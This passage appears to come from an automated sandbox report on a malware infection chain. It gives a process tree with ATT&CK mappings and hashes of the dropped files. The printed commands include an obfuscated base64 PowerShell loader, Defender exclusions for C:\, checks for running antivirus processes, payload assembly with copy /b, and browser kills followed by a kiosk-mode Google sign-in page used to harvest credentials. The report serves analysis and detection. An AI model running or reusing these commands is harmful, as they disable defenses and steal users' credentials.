cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\10381770101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381770101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3852
      - C:\Users\Admin\AppData\Local\Temp\10381780101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381780101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 496
        8⤵
        Program crash
        
        PID:4576
      - C:\Users\Admin\AppData\Local\Temp\10381790101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381790101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5020
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5348
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5368
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5552
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5848
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3988
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:528
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1232
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3704
      - C:\Users\Admin\AppData\Local\Temp\10381800101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381800101\u75a1_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5596
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:3772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:1624
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Executes dropped EXE
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\{ca0d2e31-9d09-4ae6-b59b-09e30df3204a}\63aa33a8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{ca0d2e31-9d09-4ae6-b59b-09e30df3204a}\63aa33a8.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\{d3b29547-9cc8-475b-b41d-0258baa5e1b1}\350ea713.exe
        
        C:/Users/Admin/AppData/Local/Temp/{d3b29547-9cc8-475b-b41d-0258baa5e1b1}/\350ea713.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:8504
      - C:\Users\Admin\AppData\Local\Temp\10381810101\b27646bfd0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381810101\b27646bfd0.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3348
      - C:\Users\Admin\AppData\Local\Temp\10381820101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381820101\EPTwCQd.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6152
      - C:\Users\Admin\AppData\Local\Temp\10381830101\c12c863c84.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381830101\c12c863c84.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6624
      - C:\Users\Admin\AppData\Local\Temp\10381840101\b64e32f6b4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381840101\b64e32f6b4.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2736
      - C:\Users\Admin\AppData\Local\Temp\10381850101\6501a0b69e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381850101\6501a0b69e.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:7268
      - C:\Users\Admin\AppData\Local\Temp\10381860101\42c2eafe9e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381860101\42c2eafe9e.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:9064
      - C:\Users\Admin\AppData\Local\Temp\10381870101\101b264521.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381870101\101b264521.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:11148
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:11404
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:12192
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:12604
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1376
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {97dc65d8-d5bc-408f-86f3-d988dd717b1c} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:12988
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {faad8986-dfe9-469c-b56a-dd8c377522df} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:6288
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3904 -prefsLen 25164 -prefMapHandle 3908 -prefMapSize 270279 -jsInitHandle 3912 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3920 -initialChannelId {701e6a44-8564-42bb-9d7f-e57877ee9bc0} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:7648
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4084 -prefsLen 27276 -prefMapHandle 4088 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {ee177391-f7d2-4839-87bd-04a30791eb3f} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:7768
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4576 -prefsLen 34775 -prefMapHandle 4580 -prefMapSize 270279 -jsInitHandle 4584 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3000 -initialChannelId {aeba0384-07ce-436f-bda4-19e0d5eee5aa} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:5676
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5200 -prefsLen 35012 -prefMapHandle 5204 -prefMapSize 270279 -ipcHandle 5208 -initialChannelId {f465bdaa-ccc4-4e9b-898e-788703f858be} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:7164
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5432 -prefsLen 32952 -prefMapHandle 5436 -prefMapSize 270279 -jsInitHandle 5440 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5388 -initialChannelId {fa3df0ad-c886-4aa7-b684-b9f31005eb8d} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:8576
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5460 -prefsLen 32952 -prefMapHandle 5464 -prefMapSize 270279 -jsInitHandle 5468 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5380 -initialChannelId {59e844c7-95f1-479a-a8d4-2e7cef253040} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:8560
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5784 -prefsLen 32952 -prefMapHandle 5788 -prefMapSize 270279 -jsInitHandle 5792 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5804 -initialChannelId {dd97d37c-08b6-49ba-b03b-b39909deb087} -parentPid 1376 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1376" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:8528
      - C:\Users\Admin\AppData\Local\Temp\10381880101\cbe2fbdc64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381880101\cbe2fbdc64.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7528
      - C:\Users\Admin\AppData\Local\Temp\10381890101\c95df9f846.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381890101\c95df9f846.exe"
        6⤵
        
        PID:2444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:2336

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3340 -ip 3340
1⤵
PID:624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2704

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6024cd18-4de4-4bae-a78c-2c9b25e934d0}\1f7685b3-e41e-47a2-8c80-0201ae6327f6.cmd"0
1⤵
PID:8580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_b30be13da_arkmon.sys

Filesize
390KB

MD5
7c924dd4d20055c80007791130e2d03f

SHA1
072f004ddcc8ddf12aba64e09d7ee0ce3030973e

SHA256
406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

SHA512
ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

Download Submit
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
2.0MB

MD5
95e078a0e59f8c398a46ad93b5ebcfe9

SHA1
53630fbe4996e7d1aca4a2c831ecc1e9b54042eb

SHA256
b8b6d14ab39b91234fb0553accc190fb055cb4fac966936c000f12f2be78a613

SHA512
1d64f814016d918f8026972efd7183e49447ee4a4a66abc1c58de0d3b94c694e260c8658dc9dbced4a9b5a58239510f89e4e2a3fee5e879b0bbb60d7cea63c98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7P8EHEOE\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
f52d6aca8c85c6bcff932bf6e8b3a798

SHA1
7f31a2104cae1acc32e9246512fb5f31edf8a122

SHA256
1c04cea1846b6e1e1d683bdaad88bdf251174245bd418262dba0ea6dc2ea0fd4

SHA512
ebeb4d5b5053f120fd98139bcbbb6f930ab3e3dacfe78f29f5fa751786e04745e0a95af78e45d45037fa72e40cdaa618358f528fa1928c8c59ba8047542481a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8f7e7e9b39f6b4a55a46981c2330899e

SHA1
ba9df342a440285ed9a2ea993b3acdcb04c7fc4b

SHA256
0bc8c803bbf5d9b5dd620eb8cc41750f59d2fcd5aec02664a200879d6dd807dd

SHA512
395f19fd25acb0d0af5de9fa9ebc9f11c6e470ed7cf216fde2590198430c6c2f02a0af33bbd60330d6fe5ce7a7756d19083c77dff4e694023e3141710127045e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\activity-stream.discovery_stream.json

Filesize
24KB

MD5
359ef7c2d9bd03069e97992477196008

SHA1
27b4c178af15389dba1bf0eba9ba3cf8b382aaf2

SHA256
10ab191bed307c947a87b87d9b95335ad93795c0e48e3b483970b318abccf3d2

SHA512
134e194ec3e6496b467ae0447ab293812ae4a4e648a55014ba62eac6e9dfe1a097c2da2e17c22be8178fd4d0cfea7a9dbaa337c46d2ac117392c27e61a9e9d0c

Download Submit
C:\Users\Admin\AppData\Local\TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE

Filesize
1.8MB

MD5
6ccf93c0cef65b2510ff1fcff52e7fb8

SHA1
3db6bf3e3f7ed0a0fb767b79171e9ad34c03b0d1

SHA256
8da34a9f000b0b4e40a66e3aa4739b089b55b26a95a0eb58cc0bff7d67ed8021

SHA512
757d0f599617574f2f08b8a1f252b9256b65c914c7f880479e86df9cdf39eb2bba1f4fcb9384d4915bd0fedc9cdbc7b5842cd95df8160d24a01e8d51ff836ae8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381710101\825212ef2a.exe

Filesize
240KB

MD5
093e2ed120cbc7bc379922be8683e122

SHA1
d9aa396f07b1a63548743fbcd3660ef0d1a516aa

SHA256
ea34971de3173b7f56c089f878e72731af62a752c7fd9b4cae2d14882bb64c23

SHA512
dfb93653870aa0c08a1096cb12f3a2e15ec76eb68fe43caa665f3672d4791b52d11942d6a7bb33c0bafd8c061b067580932d71bd817098d53a59ae4bd51bab59

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381710101\825212ef2a.exe

Filesize
240KB

MD5
fdd55ad9190ca9a56c0d400d65b7504f

SHA1
cd2e1d9636fa035ec3c739a478b9f92bf3b52727

SHA256
79c986fd9c87542256a607eff10f5a2f84165b08bd9dd161e2d33e213607b487

SHA512
bea47ea7099e6922ffa60442e3f7010fdffa86e37a020e2fc30502b42a76ad5fbfd9780af988742b398fb9487744d4095912183157aa89ae40f31492b76e95cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381720101\7233a9ab97.exe

Filesize
4.5MB

MD5
289e4ddcf0bf64afdb644fb575a8b1a5

SHA1
6213ebcbc71ccea7e065abd6c83ed51e90c28288

SHA256
7d254530f4e89834307333d738f71afe7a0dec12953f80a4fbfb4e03675910d5

SHA512
f4220a0288389ee49109dc569126eb827bba4204c53547e9e70dda23c27a7579bb8f2f43a1fba0e81305333679f1ce1d0eb794292c9a06157e7d19e0600d9784

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381730101\001110901b.exe

Filesize
4.3MB

MD5
4ea661c85a082117e59ea78f2f140a1c

SHA1
49940f31bc96b08d70c1ef56d010ea320f9bbb74

SHA256
389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a

SHA512
df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381740101\ee4dd30ae4.exe

Filesize
1.1MB

MD5
96fa728730da64d7d6049c305c40232c

SHA1
3fd03c4f32e3f9dbcc617507a7a842afb668c4de

SHA256
28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

SHA512
c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe

Filesize
158KB

MD5
6fa0611a9e1348246fa21da054dd95bb

SHA1
1b673314b0ba771d690d6f3bccf34082e2e4c294

SHA256
2e01911a0853b660f1583d50a8755a4a1f67f17ce6d19d3c24b9f61d1c13f01d

SHA512
e6168791c1ec105cb66263cef029eeea5592d1f495f5ada10bbbb4d669d757f69cab3a9c09e12b10943cac1dd03602a7ab1bf2fe687876ee8aef541990875759

Download Submit
C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd

Filesize
1.4MB

MD5
2f0f5fb7efce1c965ff89e19a9625d60

SHA1
622ff9fe44be78dc07f92160d1341abb8d251ca6

SHA256
426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

SHA512
b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

Download Submit
